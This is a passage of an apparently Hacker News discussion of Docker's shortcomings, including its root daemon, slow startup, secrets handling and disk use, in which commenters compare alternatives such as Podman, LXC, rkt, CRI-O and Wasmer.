aloknnikhil 5 years ago

> In fact, a global system daemon should not be needed. Either users should be able to run their own daemons or container management should avoid having a daemon at all, by storing container state in a shared database.

Absolutely love Podman. You can even define registries to work with docker hub, easily.

https://podman.io

  • nikisweeting 5 years ago

    Yeah but no docker-compose support :/ dealbreaker for us. Theres an alpha podman-compose project but we couldn't get it running.

    • likeclockwork 5 years ago

      You really don't need it since podman has pods of containers that communicate with each other. You can export and playback the pods as kubernetes yaml.. but I just use a bash script + an environment file to configure, create and launch pods. What else is docker-compose really doing for you?

      • nikisweeting 5 years ago

        Our entire company runs on like ~20 docker-compose files. It's a super elegant way to describe collections of containers without the management overhead of Kubernetes. We've had nothing but good experiences with compose, and lots of headaches with Docker swarm and K8s.

    • dharmab 5 years ago

      Both Podman and CRI-O support Pods, which can fill the same use case as docker-compose

      • nikisweeting 5 years ago

        Which require kubernetes, which requires a full-time team member just to manage. Docker-compose has been a lifesaver for low-complexity declarative service management on our self-hosted systems.

neckardt 5 years ago

I'm surprised nobody is mentioning LXC[1]. I'm by no means a containers expert, but they claim to be more secure since they default to running as non-root. Unlike docker, I had no trouble installing LXC with apt, while with docker I often got an outdated version. I'm now using LXC for all of my basic container applications (self hosting a wiki and a few other sites).

[1]: https://linuxcontainers.org/

  • dvfjsdhgfv 5 years ago

    Because LXC has no marketing money like Docker. For me it's just one of these cool tools I use every day without giving it a second thought.

    • jsilence 5 years ago

      How is the tooling compared to Docker? Genuinely interested. Are there platforms like Portainer available? Is something like docker-compose possible?

      • zaarn 5 years ago

        LXC is a bit more simple than that; the modus-operandi is to unpack the rootfs of your favorite distro (ie, ubuntu, alpine) into the container and it runs /bin/init in that container. It essentially behaves like a full VM without the virtualization part.

        Tooling would be things like Ansible to setup the container as if you would a normal linux system. Though to be honest, not many people invested in good tooling around LXC, it should be possible without problem to run a docker rootfs in LXC.

  • jeff_vader 5 years ago

    One reason it's not very popular (from my experience): Docker Desktop for macs, which makes Docker experience on mac os feel somewhat close to native. Meanwhile, to use LXC you'd have to work inside VM (Virtualbox or similar). Last 3 companies I worked for (in London) were almost 100% mac os (which is a little sad).

    • MrBuddyCasino 5 years ago

      If you use "kind" to create a K8S cluster on MAC, using LXC is totally transparent. You can just load regular Docker images via "kind load docker-image". It even takes less RAM than minikube, because the running Docker VM is re-used.

  • dbleyl 5 years ago

    lxc is awesome, wondering the same thing. Also has some niches in the kubernetes space. Using lxc for development DBs and private servers.

  • FreeHugs 5 years ago

    How do you create an image for LXC?

    With docker, they have the docker.io service with all types of distros you can chose from.

    • rlpb 5 years ago

      The project provides prebuilt images for all the common distros: https://us.images.linuxcontainers.org/

      Use them in one command. For example:

          lxc launch images:debian/sid/amd64
      
      Ubuntu, which I believe is the most popular image base in Docker, ships official cloud images, and you can also use these in one command:

          lxc launch ubuntu:bionic
      • FreeHugs 5 years ago

        That sounds dangerous:

            All images available on this server are
            generated using community supported, upstream
            LXC image templates
        
        And:

            Note that the images found on this image server are
            unofficial images. Whenever possible, you should try
            to use official images from your Linux distribution
            of choice
        • rlpb 5 years ago

          That's no different from Docker's community images, is it? And as I pointed out, Ubuntu ships official images, which was demonstrated in my second command.

          • FreeHugs 5 years ago

            Don't know about Ubuntu because I use Debian.

            docker.io calls their Debian images "official" and says they are maintained by two Debian developers.

    • StreamBright 5 years ago

      You can use the following:

          lxc image import metadata.tar.gz rootfs.tar.gz --alias hello
      
      Not sure which part of the process are you referring to though.
  • judge2020 5 years ago

    Docker isn't up to date on the official Ubuntu (and debian too?) repos for some odd reason. A better way is either snap (snapcraft) or adding docker's own apt repository.

    • FreeHugs 5 years ago

      Aren't those images provided by Ubuntu and Debian? Then it would not be under the control of Docker which versions are provided.

      docker.io provides Debian 10 as far as I can tell.

    • e12e 5 years ago

      Docker (the daemon and tooling) is generally upstream-supplied (ie: docker provides apt repos etc).

      Not uncommon for rapidly moving upstream. I wouldn't recommend running distro-supplied docker in general (and neither do docker).

      Curated apt repos is nicer than snaps, IMNHO.

    • fiatjaf 5 years ago

      snap never works.

  • aitchnyu 5 years ago

    How cross-platform is LXC containers? Somehow I still use Vagrant in my pet project, since I want Windows and Mac users to have a dev environment in a few steps.

KaiserPro 5 years ago

A few things that I would add to that list:

o No primitives to deal with secrets.

o Terrible disk handling (aufs was just horrid, overlay2 I think misses the point. device mapper is just, silly)

o poor speed when downloading and uncompressing images.

Of all of them, the most serious is the lack of secrets handling. Basically you have to use environment variables. Yes, you can use docker compose and stuff appears, but thats only useful if you use compose/swarm.

In this day and age, to have secrets as a very distant afterthought is pretty unforgivable.

  • xorcist 5 years ago

    The most basic problem with Docker is the use of a daemon that is not init.

    Access control is at best problematic.

    Upgrading the daemon without losing state is tricky.

    Requiring daemon access to build images is insane.

    Building this functionality into something like systemd would be more robust but it's way harder to sell as a product.

    • Smithalicious 5 years ago

      Yeah Docker should get with the times and be assimilated into systemd like everything else

      • oblio 5 years ago

        You could argue about many things bundled with systemd, but since containers are just souped-up processes, this is actually an use case that make sense for an init system.

        • CameronNemo 5 years ago

          I disagree. I would prefer to have a model where the supervisor needs no knowledge of the LSM profile, namespaces, seccomp profile, or cgroups applied to a service. Additionaly, I would prefer a non-init service supervisor.

        • ahartmetz 5 years ago

          I see them as souped-down virtual machines or the new vServers but with a decent interface. vServers (a bunch of hacks to separate users as if running different Linux instances) were pretty awful.

    • ahartmetz 5 years ago

      Okay Lennart, if you say so.

  • antocv 5 years ago

    What do you consider a secret? What other system do you recommend which has the feature you want?

    I cant see how one would inject data into a process without ptracing/gdb-attaching to it, messing with its internal memory, or just use environment variables or argument list. If you put it on a file somewhere, you still have to tell the process where the file is by an argument or env and also manage that "volume" and uid space of that file and process.

    Kubernetes secrets have nothing to do with containers - it anyway usually exposes the secret as env var or volume and file.

    • KaiserPro 5 years ago

      A secret is anything that you don't want to be public. normally API keys, or some other similar token.

      Its not even a case of stopping people attaching a debugger, there is simply not standard mechanism. Some sort of secret store should be a primitive in any container/VM/unikernel built since 2012.

      The "recommended" way is to map a volume in to a container. But thats rubbish, there is no standard place to put it, and crucially no API to fill the volume full of secrets. How do I map the specific volume to a container? you can't its manual.

      what would be nice is either a tagged value store, so you can specify a tag when you build a container, so that you have a way to signal which secrets your container wants. Or a lump of the container that you can encrypt, that has a key value store in it.

      There are lots of documents telling you that you _shouldn't_ embed secrets in your container, but there are not many howtos that don't involve the engineering equivalent of gaffer tape and wet string.

      Most of this has now been solved by better[] orchestration systems.

      [] not great though.

    • heyoni 5 years ago

      I smell potential for a fun tutorial with that last part!

  • paulddraper 5 years ago

    > the most serious is the lack of secrets handling. Basically you have to use environment variables.

    That's how I always handle my secrets. (12 factor app)

    Am I missing a better way?

    • fhgsfkcc 5 years ago

      secrets don't belong in env vars, because many languages and/or frameworks will happily dump all your env vars to users in the event of misconfiguration or some errors.

      • paulddraper 5 years ago

        I have literally never seen that happen. (Outside a core dump, which has a lot more than env var.)

        You have any examples in mind?

        • ygjb 5 years ago

          It happens all the time, especially in security and quality assurance testing. It's less common in modern versions of tools and frameworks, but I routinely encounter these kinds of dumps when I am doing security testing work on anything enterprisey.

        • nikisweeting 5 years ago

          Django error pages with DEBUG=True.

nickjj 5 years ago

I've been using Docker since 2015ish and the container start up / stop speed is really the only thing that bugs me.

Everything else is fine for day to day usage IMO (on Windows and Linux at least) and very much worth the trade offs, but having to wait multiple seconds for your app to start is tedious since it plays such a heavy role in both development and even in production. Each second your app is not running is downtime, assuming you're not load balanced.

I opened an issue for this almost a year ago but not too much has come from it other than identifying there was maybe a regression in recent'ish versions: https://github.com/moby/moby/issues/38077

We're talking multiple seconds in Docker vs ~150ms as a regular process to start up a typical web app process like gunicorn in a decently sized Flask app (many thousands of lines of code, lots of dependencies -- a real world app).

  • james_s_tayler 5 years ago

    I take it you've never worked in an enterprise Java shop with a few million line legacy code base deployed to whatever the hell webserver I can't remember the name of right now.

    Seconds is great in comparison. Minutes, not so much.

    • cs02rm0 5 years ago

      JBoss, Websphere? I know that pain, hadn't even occurred to me that anyone would think containers had a slow startup time. Especially as they've often replaced VMs for me.

      • james_s_tayler 5 years ago

        WebLogic.

        • tuananh 5 years ago

          this name brings back lots of painful memory back in the day.

  • TheWizardofOdds 5 years ago

    The long startup time is somehow what keeps me from really liking Docker. In the end (if I understood correctly), it is supposed to be the go-to tool for serverless architecture. If my serverless function needs more then a second to startup, it's not usable for me.

    Even the hello-world container, which is only a few kB in size needs roughly a second to startup.

    • _hao 5 years ago

      I'm working on a web service that takes 4-5 minutes to startup because of all the shit it has to warm-up. I'd be happy if it takes even a minute IF I could port it to a newer tech stack and can containerize it.

    • utopian3 5 years ago

      > In the end (if I understood correctly), it is supposed to be the go-to tool for serverless architecture.

      You misunderstood. No one calls Docker a “serverless” architecture.

      • TheWizardofOdds 5 years ago

        And i didn't either, I called it a tool for serverless architecture. In fact some tools for serverless architecture like AWS Fargate require you to use Docker.

        • VonGallifrey 5 years ago

          I know that AWS Fargate has the tagline of "Run containers without managing servers or clusters", but that is not what "serverless architecture" means. Fargate is a container service.

          Serverless would be, for example, AWS Lambda, Azure Functions or Google Cloud Functions.

          • onefuncman 5 years ago

            Fargate is serverless because the compute is abstracted away completely. A lambda runtime is just a specialized container and they've added similar customizability to it lately with Layers/Runtime configuration.

            • VonGallifrey 5 years ago

              I know that the definitions of these kinds of buzzwords can be fuzzy sometimes, but I have never heard a definition of serverless that would include Fargate.

              Here is what Cloudflare uses to describe serverless:

              > Serverless computing is a method of providing backend services on an as-used basis. Servers are still used, but a company that gets backend services from a serverless vendor is charged based on usage, not a fixed amount of bandwidth or number of servers.

              With Fargate you still get charged for your running instances your containers are running on. Even if the containers themselves are idle. This is a container service and not a serverless architecture.

              • chatmasta 5 years ago

                How do you come to this conclusion from this pricing page? [0]

                I might be missing something but that seems like serverless pricing. You might be thinking of the pricing scheme when Fargate first launched? Or maybe you’re thinking of ECS, which does in fact charge as you described.

                [0] https://aws.amazon.com/fargate/pricing/

                • VonGallifrey 5 years ago

                  Everything I am reading there screams container service and not serverless. Some Quotes:

                  > You pay for the amount of vCPU and memory resources consumed by your containerized applications.

                  How does vCPU fit into serverless architecture?

                  > Pricing is based on requested vCPU and memory resources for the Task.

                  Tasks being a collection of Containers. This is simply a container service like ECS or EKS.

                  > Pricing is calculated based on the vCPU and memory resources used from the time you start to download your container image (docker pull) until the Amazon ECS Task terminates.

                  This means you pay for the resources that were started for your containers until the container ends. Including all idle time and any overprovisioning you did because you have to tell it which instance type you want. Compare that to the pricing of Lambda where you only pay for the time your functions need to execute when they get called based on external events.

                  To bring this back to the beginning of the discussion: Complaining about docker because it is not a good tool for serverless architectures is not smart because it is not used in serverless architecture offerings. Fargate uses containers but it is not a serverless service. Fargate is a container service that tries to simplify setup of compute clusters in comparison to ECS, EKS and EC2.

  • hbt 5 years ago

    - start the container with docker run and run sleep 999

    - then start your application with docker exec

    you will have instant execution.

    Only restart your container if the environment changes (new build etc.)

    For development, mount your source code in readonly.

  • croo 5 years ago

    Few seconds are my dream coming true. Try working on an application where every deploy is a coffee break... :(

    • xorcist 5 years ago

      Starting the process probably isn't what's taking so long though.

      • oblio 5 years ago

        You'd be surprised. Big Java enterprise apps deployed to Tomcat or God-forbid! IBM/Oracle app servers can take 2-3-5 minutes just to be fully operational. I've had deployment health checkers timeout after 2 minutes because the servers just wouldn't be up. It seems insane, but that's how life looks for thousands of developers.

        • nickjj 5 years ago

          > It seems insane, but that's how life looks for thousands of developers.

          True, but there's tens of thousands of developers not using big Java enterprise apps where having Docker add 4-5-6+ seconds of startup time has a huge negative impact.

          gunicorn (Python) apps tend to start in hundreds of milliseconds (even pretty big ones).

          puma (Ruby) apps tend to start in seconds or tens of seconds (it can get higher for massive apps).

          cowboy (Elixir) apps tend to start in low seconds (this includes booting up the BEAM VM).

          Just the above 3 examples cover the Flask, Django, Rails and Phoenix ecosystem. That's a lot of developers.

          • oblio 5 years ago

            I've been part of Ruby teams and Rails apps can start almost as slow as Java apps. Big .NET projects, too.

            Plus there's probably 10x more Java developers than Ruby developers out there. And Elixir/Phoenix devs are probably 0.001% of Java devs :-)

            • nickjj 5 years ago

              It depends on how big the Rails app is.

              One app I work with has 40 top level gems and about 17,000 lines of Ruby code (which goes a longs ways in Rails). It's not "big big" but it's not tiny. It takes under 10s to boot up. I'm sure if you have a Shopify-tier app it takes much longer, but a majority of apps aren't at that scale.

              I was just throwing out examples and I'm just trying to say not everyone is dealing with cases where Docker's added 2-5+ seconds isn't a big deal. For a Flask app those few seconds make it ~20-50x longer to start up due to Docker and for a majority of other frameworks / average app sizes, it's a non-ignorable amount.

chucky_z 5 years ago

I am currently on this train.

Having used rkt in the past, I went to revisit it recently only to find this: https://www.cncf.io/blog/2019/08/16/cncf-archives-the-rkt-pr...

I am so extremely disappointed in the CNCF as rkt (at the time, at least) seemed to be more "production ready" than Docker.

Are there any real alternatives? Is the answer "find something else that uses containerd in a more friendly way?" Is the answer "try to use podman/buildah, which are weird in their own way?"

  • roca 5 years ago

    Podman looks interesting at a quick glance, though not supporting docker-compose makes migrating nontrivial for us.

    • devmunchies 5 years ago

      and my attempt to get it run on mac were fruitless. I would have to do it in a Vagrant VM like 5 years ago.

  • angry_octet 5 years ago

    Wasn't that because RedHat bought CoreOS, and RH is all k8s? And then no one was pushing rkt along with commercial support, so it died?

    Agree the rkt was cool. I just don't know if RH is becoming more like MSFT or more like Oracle.

  • l_t 5 years ago

    Maybe containerd [0] is an alternative? It's being used in k3s instead of Docker.

    [0]: https://containerd.io/

    edit: I didn't notice that you mentioned this in your comment, my bad. Can you explain why it doesn't work for you? I'm new to the Docker-alternative scene and thought it looked pretty good at first glance.

  • dharmab 5 years ago

    We're implementing CRI-O so we can use Docker and Kata Containers side by side for different workloads. We're hoping if things go well we can fully migrate off Docker after a few years of transition, but it's in early stages.

ses1984 5 years ago

There are two kinds of software: software no one uses, and software people complain about.

  • notyourday 5 years ago

    There's also software that was created to solve a specific problem that got misappropriated to do something else

    There used to be an ISP called pilot.net. It was a crappy ISP but to solve its ISP billing problem it wrote a billing system for telcos.

    There was a company that tried competing with AWS selling hosting based on hyperthreads of CPUs. It wrote its own provisioning system because it did not want to pay for Virtuozzo. The company's name used to be dotCloud.

    • otabdeveloper4 5 years ago

      > There's also software that was created to solve a specific problem that got misappropriated to do something else

      Docker is a classic case. Docker must be the craziest, most over-engineered solution for packaging developer artifacts in the Universe.

      • majewsky 5 years ago

        In the same way that Dropbox is the most over-engineered solution for file sharing, when all you need is an SVN-backed directory with curltmpfs. ;)

    • oblio 5 years ago

      What's the link between pilot.net and dotCloud? Did dotCloud use the billing system from pilot.net?

  • Kaiyou 5 years ago

    Also feature complete software that is regularly used by lots of people, but nobody complains about, because devs don't mess with it anymore. Think ls, grep, yes, ...

    • ses1984 5 years ago

      I will happily complain about grep. My complaints might not be valid but I'll happily do it. I hate that bsd and gnu grep are different. I can never remember when and which flag I need to pass when my expression has stuff in it the default can't handle. I don't like that it's slower than alternatives like ag. I wish it would automatically handle compressed data.

      Also the saying is not as pithy if you add more kinds of software.

    • oblio 5 years ago

      Devs can't mess with it anymore, you mean? There's a myriad alternatives to ls, grep, etc. Dunno about alternatives to yes, maybe there's a si/oui/da out there? :)

      Sometimes the alternatives are considered superior to the originals (ripgrep) but the originals are just fossilized in place. In 2019 I don't even think we'd be able to have less as the pager instead of more, because we're so conservative about universals defaults, it's sad.

      • Kaiyou 5 years ago

        Well, sure. There are alternatives, but the original software stands as it is and is available out of the box. It's really useful to learn once and then use everywhere.

  • james_s_tayler 5 years ago

    Why have I not heard this before?

    Brilliant.

    I'm going to file this right alongside "software is never finished, only abandoned"

    • ses1984 5 years ago

      I don't know if I would call it brilliant, it's pretty funny though. I didn't make it up.

      Your quote is first said about art and attributed to Da Vinci.

  • e_proxus 5 years ago

    There's also the almost never used software that people complain about being forced to use.

bob1029 5 years ago

What's wrong with booting a VM off a standardized base image (e.g. an AMI), and then applying simple deployment scripts for each application you need to run? You could probably replicate 90% of the justification for using docker with some basic scripting.

  git clone https://github.com/myprofile/my-cool-app
  cd my-cool-app
  chmod +x deploy.sh
  ./deploy.sh
That's it. The above script would be responsible for getting your application runtime environment up and then getting the application running as a persistent service with reasonable defaults. Most cloud vendors let you put something like that in your VM startup configuration. All you would need from this point is to ensure that any sort of desired management functions are built into the app itself. Perhaps having a central management service it communicates with across the public internet would be a good place to start. You don't need a lot of tooling to make a huge impact here. If you own the codebase behind it, and have a fundamental understanding of your deployment techniques, you can easily pivot and embrace radical new approaches. If you are stuck on Docker, this doesn't seem as optimistic from where I am standing.
  • jordanthoms 5 years ago

    That approach works, but if you are going to go into production with it you might need to support:

    - Rollbacks

    - Automatic deployment of new releases from CI, rolling releases

    - Healthchecks, detecting if/when the server exits and making sure that VM gets killed

    - Canary deployments

    - Autoscaling (could use an autoscaling instance group for it, but what if you need to scale based on other metrics)

    - Log aggregation

    - Monitoring

    - Service discovery, load balancing between services

    - Service mesh

    - Fast startup of instances (starting a fresh VM and waiting for it to setup everything from scratch could take ~3-4 minutes, docker is in the ~30s or less range).

    - Bin-packing (run a high-cpu low-memory workload colocated with a low-cpu high-memory workload for maximum efficiency)

    etc, etc, all of which you get either out of the box or without a huge amount of work if you adopt something like Google Kubernetes Engine (which takes a few clicks to spin up a cluster).

    If you don't need any of that stuff and don't want to learn Kubernetes, it's totally justifiable to go that way, but personally I would take Google Kubernetes Engine over something like that any time. There's some up-front cost learning how it works which then pays off very quickly.

    • KaiserPro 5 years ago

      None of these features are a function of docker, they are a function of the orchestration layer.

      bin-packing isn't what you describe, its shoving as much stuff on a machine as possible. Proper resource dependencies management allows what you describe, something k8s is weak on compared to other orchestration systems.

    • ay 5 years ago

      What about hashicorp’s nomad ? In my experience it does pretty much all of the above at a fraction of the complexity...

  • spookthesunset 5 years ago

    Okay so write your own crappy (excuse me, graceful and elegant) pile of shell scripts that nobody in your company but you understands? Sounds good to me.

    The second you leave, somebody is gonna rip that crap out and replace it with docker. All while mumbling under their breath...

    • james_s_tayler 5 years ago

      This. Times 100x. This is one of Dockers biggest value adds.

    • eeZah7Ux 5 years ago

      Nonsense. Applications have a lot of complexity and therefore code around initialization. Adding a little script to deploy them is harmless.

      It's also the approach used by various FAANGs operating at a large scale.

  • roca 5 years ago

    Off the top of my head: two things in our (OP) case: 1) Memory overhead 2) Slow access to filesystem storage shared between containers

  • lacampbell 5 years ago

    This is what I ended up doing. Don't laugh, but I spent about two weekends furiously learning docker for a side project, only to replace it with a shell script of about 100 lines.

    I'm sure containers have valid use cases for larger teams, but for one person I didn't see the point at all - especially as I use the same OS for dev and production.

    • samvher 5 years ago

      Docker is not only about having reproducible environments. I mostly work as a single developer and I use Docker all the time, mainly because I like the isolation properties and because it's super easy to launch certain services (e.g. set up a postgres database). In the past really often I would have issues with conflicting dependencies, that's all gone now. The fact that your shell script did the job for you is obviously a good thing, but maybe that just means that in this particular situation Docker didn't have much to offer for you.

    • james_s_tayler 5 years ago

      I use docker all the time when doing side projects by myself. It's nice because I don't know ahead of time what the dependencies will be but I don't really care. I just pull in all the container images via docker compose and suddenly everything is there and talking to each other.

      I find it very ergonomic outside the need to run docker system prune from time to time.

      I also value it highly when some open source project I want to play with has docker compose in its readme. Super easy just to spin it up.

  • dharmab 5 years ago

    Low efficiencies. When you work with 1000s of cores, a VM per app instances is literally millions of dollars annually of wasted CPU compared to using a container orchestrator.

  • techntoke 5 years ago

    This is way slower than Docker. Rootless containers are already a thing. If you still want VMs then see Kata Containers. Containers have a lot of benefits, the major one for me is reproducibility and application sandboxing. There is a reason containers exist and that every large cloud platform has adopted them, including Microsoft adding support in Windows.

    • notyourday 5 years ago

      > This is way slower than Docker.

      add-job bake-instances --app=my-id --instances=200

      Oh, you never wrote tooling and you dont have a jobbing engine? Well, that's the complaiing that you can't get an an Uber because you did not download an app. It is sort of funny because every single shop that is "oh containers!" either creates them manually ( slow and painfully ) or just uses random ones developers find.

      > There is a reason containers exist and that every large cloud platform has adopted them, including Microsoft adding support in Windows.

      It is the same reason why Whole Foods sells sushi: that's teh way to sell salmon for $85/lb to hipsters. Hipsters hate buying salmon for $22/lb but they love the rolls.

      • techntoke 5 years ago

        > Oh, you never wrote tooling and you dont have a jobbing engine? Well, that's the complaiing that you can't get an an Uber because you did not download an app. It is sort of funny because every single shop that is "oh containers!" either creates them manually ( slow and painfully ) or just uses random ones developers find.

        Whatever helps you sleep at night. Creating a container image doesn't have to be slow. There are a lot of tools to help with this that provide things like caching. If I find a container image, the first thing I do is look at the Dockerfile to see if it follows best practices, and if it is secure and lightweight. A lot of the official images on Docker Hub are pretty good. Creating a VM image is going to be slower than Docker period.

        > It is the same reason why Whole Foods sells sushi: that's teh way to sell salmon for $85/lb to hipsters. Hipsters hate buying salmon for $22/lb but they love the rolls.

        I don't know what this has to do with anything. Besides, I thought hipsters would be vegan.

zests 5 years ago

I'm newer to the Docker scene but haven't really found any of the complaints in this article realized in my work. Faster speed would be nice but I don't really mind it now.

I see a lot of complaints about the docker daemon and root privileges on HN and I've tried to understand where they are coming from but I can't get anywhere. For instance, I understand the reasoning behind "if there is no need for a daemon there shouldn't be a daemon" but I don't really understand what the actual/realized/tangible benefits of not having a daemon would be.

  • roca 5 years ago

    We have observed the daemon getting into a bad state and stopping responding to container create requests, wedging our production system. I guess this kind of bug could happen with a non-daemon approach if there's shared state, but it seems less likely.

    Not using any components with root privileges obviously makes things more secure.

    Another benefit of not requiring a daemon or privileges is that then it should be easy to manage fully independent sets of containers. In particular a container should be able to manage its own nested containers in a straightforward way. This is painful in Docker.

  • lmeyerov 5 years ago

    We hit security concerns here in two directions:

    -- When our sw gets deployed on-prem by our users (or in their cloud, or wherever), our customers rather not deploy our SW with root for no good reason. Some of them have to do things like fill out forms ahead of time or on use due to this (!).

    -- In turn, when we run third-party code, say as a normal dependency or a user-submitted script, we have no reason to trust it. That means we want to limit what it can do, and especially if something breaks out, have defensive layers. (Browsers & NodeJS are Technology From The Future in this regards.)

    Note that almost all "docker exploit X FUD" articles, in fine print, make assumptions around running docker as root / privileged / etc. It's 2019, we know better.

    Also, we happen to run an increasing amount of our stack as GPU code, which adds a (not so) funny layer to all this.

    • james_s_tayler 5 years ago

      I didn't consider the on-prem use case, but I can see how that could become an issue.

  • wokwokwok 5 years ago

    It would be faster.

    I also don’t really care if a container take 2 seconds or 100ms to start... but building docker images is painfully slow.

    I’ve also ended up (numerous times) with the “docker daemon is borked” situation, which requires a restart to fix... and you can imagine how that sucks on a prod or multi tenant systems.

    • roca 5 years ago

      One reason we care about containers taking seconds to start is that our CI tests have to start and stop a lot of containers, and it all adds up. And running them in parallel wouldn't help because they would just bottleneck on the global docker daemon... or break entirely by interfering with each other, unless we run multiple Docker-in-Docker setups, which would be even more painful and add its own overhead.

    • krferriter 5 years ago

      I've also run into the daemon crashing on production systems and taking down all of the other containers on that host. I end up just killing the host and restarting the jobs on a newly provisioned one. There's a lot of overhead. If they could get it to run without requiring a persistent (and root) shared daemon that would be a big improvement.

    • shaklee3 5 years ago

      I think a lot of this depends on how you set up the context in your build. I've seen a lot of people just set the context to a specific directory with no ignores. The docker daemon by default tars up the entire context directory, which can be multiple GB. However, as you point out, even if you fix that problem, for some reason many of the stages take a very long time, even if they are just copying a small text file.

syrusakbary 5 years ago

The article is completely on point. Because of all the reasons exposed there (and a few more) I started Wasmer, a new container system based on WebAssembly - https://wasmer.io/

Here are some advantages of Wasmer vs Docker:

* Much faster startup time

* Smaller containers

* OS independent containers (they can run in Linux, macOS and Windows)

* Chipset independent containers (so they can run anywhere: x86_64, Aarch64/ARM, RISC-V)

  • gravypod 5 years ago

    Is there a feature by feature comparison of wasmer to docker? I don't think Wasmer, while interesting, is a container system. It looks more like a bytecode vm.

    Things I use and love from docker that to me feel "container"-y:

    1. OSs as a library (FROM alpine:3.9)

    2. Network namespaces so all applications think they are running on a machine with port 80 available

    3. Service discovery through DNS

    4. CPU and memory share allocation

    5. Volumes (bind, temporary, remote)

    6. docker-compose for single-command & single-tool development environments (all you need is docker and an internet connection)

    • syrusakbary 5 years ago

      Wasmer is an application-based container while Docker is a OS-based container.

      Because of that some of the things that you posted are a bit hard to compare.

      We believe that by having a VM (based on a industry adopted specification such as WebAssembly) we can control much more granularly both execution (CPU, memory) and the runtime interoperability with the system (networking, file system, ...), solving most of the issues that Docker containers have

      • gravypod 5 years ago

        I don't think we're using container system similarly. I'm using the term "Container" in the way Docker describes:

        >A container is a standard unit of software that packages up code and all its dependencies so the application runs quickly and reliably from one computing environment to another. A Docker container image is a lightweight, standalone, executable package of software that includes everything needed to run an application: code, runtime, system tools, system libraries and settings.[0]

        If you cannot package system tooling, system libraries, and configuration with your software I don't think what you're building is a container system. If you also loose the sorcery benefits docker's network namespaces and volume drivers you're loosing a lot of functionality that docker provides.

        I wouldn't call the JVM, RVM, V8/SpiderMonkey, cPython, and any other language VM a "container system" even though many of them allow you to set up platform isolation, restriction, and sandboxing.

        I use "container" to reference a technology that allows me to build, package, ship, and orchestrate the execution of these units.

        [0] - https://www.docker.com/resources/what-container

      • jonahbenton 5 years ago

        With all respect- Docker packages a known code stack in a box. WASM creates a whole new code stack.

        Docker, with all its problems, solves a huge problem for the enterprise. WASM, cool as it is, creates a new one.

        I would love to see a WASM + unikernel builder, and some lightweight node scheduler that could plug into kubernetes, so you could run thousands of WASM packages on a node within a k8s cluster, rather than 10s of containers. That increase in leverage would justify the new code stack risk.

      • ahnick 5 years ago

        What's the selling point of Wasmer over the JVM or BEAM?

        • syrusakbary 5 years ago

          JVM requires almost all your stack to be rewritten for it.

          Because WebAssembly permits languages to be usable in the web, almost any other language (C, C++, Rust, Go and even Java) is now working to be compiled to WebAssembly.

          Therefore you don’t need to adapt your stack to run it in Wasmer :)

          • gravypod 5 years ago

            > "JVM requires almost all your stack to be rewritten for it."

            This applies no more to the JVM than to Wasmer. There exists WASM to JVM bytecode transpilers [0].

            [0] - https://github.com/cretz/asmble

            • syrusakbary 5 years ago

              Although your point is completely right, once your application is in wasm perhaps you can use directly a wasm vm (wasmer) instead of another transpiler and the jvm :)

  • roca 5 years ago

    Wasmer looks cool but FWIW it wouldn't address our (OP) needs. For one thing, in our containers we dynamically generate x86 machine code and execute it (yes, it has to be x86). Our needs are a bit special of course.

  • anaphor 5 years ago

    One thing I also find sorely lacking in Docker is the ability to run your containers with the appropriate seccomp privileges (in order to enforce Principle of Least Authority). I know this is possible with Docker, but it's not really done much in practice because of various difficulties. I wonder how difficult it would be to do that with your tool?

    • syrusakbary 5 years ago

      Since Wasmer is in control of all the syscalls its actually quite easy to manage the privileges in a more fine-grained way (think on CloudABI permissions on top of your containers)

      • anaphor 5 years ago

        That sounds really interesting. I'm going to check it out. Thanks for working on this!

    • nwmcsween 5 years ago

      Seccomp is a horrible security model for containers, if the application or it's libraries use differing syscalls the seccomp ruleset is invalid

      • pbar 5 years ago

        A process making a system call to the kernel functions the same way regardless of whether it is in a container or not. How exactly does the security model differ at all?

        • nwmcsween 5 years ago

          Because 99.9% of software doesn't make use of direct syscalls, instead it uses wrappers or standard functions that wrap various other syscalls that can and will change over time. Meaning $app_container v0.1 can and probably will have a different seccomp filter than $app_container v0.2

          • pbar 5 years ago

            This is the same case regardless of being in a container or not, $app v0.1 and $app v0.2 will have different filters

            • nwmcsween 5 years ago

              Of course will but docker, et al attach filters to containers vs attaching it to a specific binary that is much easier (although still broken).

  • techntoke 5 years ago

    Some things to note:

    - Wasmer isn't available as a package on most distros from what I can tell. Instead they want you to curl a script directly to your shell, which is bad practice.

    - They do not have a reproducible benchmark or a test suite to prove that it is actually faster than Docker and it is likely you can't even compare them. The Docker daemon and containers generally have very fast startup times.

    - Docker containers are OS independent as well, but rely on Linux kernel features so they run more native on Linux. This isn't a negative. Most microservice apps are Linux-based.

    - Adding abstractions for the chipset has always been slower than optimizing and compiling for multiple architectures. This is like someone saying Java is better because it provides a VM that translates everything. Instead Java has a reputation for being clunky and slow because of it. Well built apps and pipelines can easily be compiled for multiple architectures. See Alpine Linux for example.

  • jdnenej 5 years ago

    This sounds like a great idea. Docker on ARM is such a pain if you aren't building everything yourself because half the packages are x86 only

    • geerlingguy 5 years ago

      More than half, I’d say 90%.

  • ctidd 5 years ago

    Looks like an interesting project. I know the website isn't responsive, but adjusting the current meta viewport declaration would go a long way while you're working on a full solution. The minimum zoom of 1 makes it unusable in practice right now on a small mobile viewport due to the amount of panning it forces you to do.

  • scanr 5 years ago

    Wasmer looks interesting.

    I couldn’t read much as I get an “unexpected error” as soon as I start scrolling. It does say that it’s not optimised for mobile.

    • syrusakbary 5 years ago

      Thanks for reporting it!

      We will investigate and try to fix it ASAP :)

      PS: if you could provide your device info (os and browser) it would be awesome

      • jackalo 5 years ago

        The black terminal next to the “Try It Now” remains blank while the cursor box zooms around it. No visible text is seen.

        iPhone XS Max, iOS 13 GM, Safari.

      • yoz 5 years ago

        Also seeing it on an iPhone 8, iOS 12.4. The site is completely unusable/unreadable.

aledalgrande 5 years ago

These are real problems with docker, but do we wanna talk about docker for Mac? A total performance disaster.

https://github.com/docker/for-mac/issues?q=is%3Aissue+is%3Ao...

  • thosakwe 5 years ago

    I have no idea how, but Docker for Mac was taking up a whopping 65GB of space in one of the cache folders in ~/Library, although I had uninstalled it months ago. I wish I had taken a screenshot, but I was honestly dumbfounded. I had used it maybe once, ever.

    EDIT: It turns out I’m not making this up/an edge case, at least 940 people have run into this too: https://github.com/docker/for-mac/issues/371

    • etimberg 5 years ago

      I have that problem too. Solution seemed to be to set up an alias to clean out old images, volumes, etc and run that every so often

      • mirimir 5 years ago

        Not just in MacOS. Over time, Docker can eat all your storage.

        • jdnenej 5 years ago

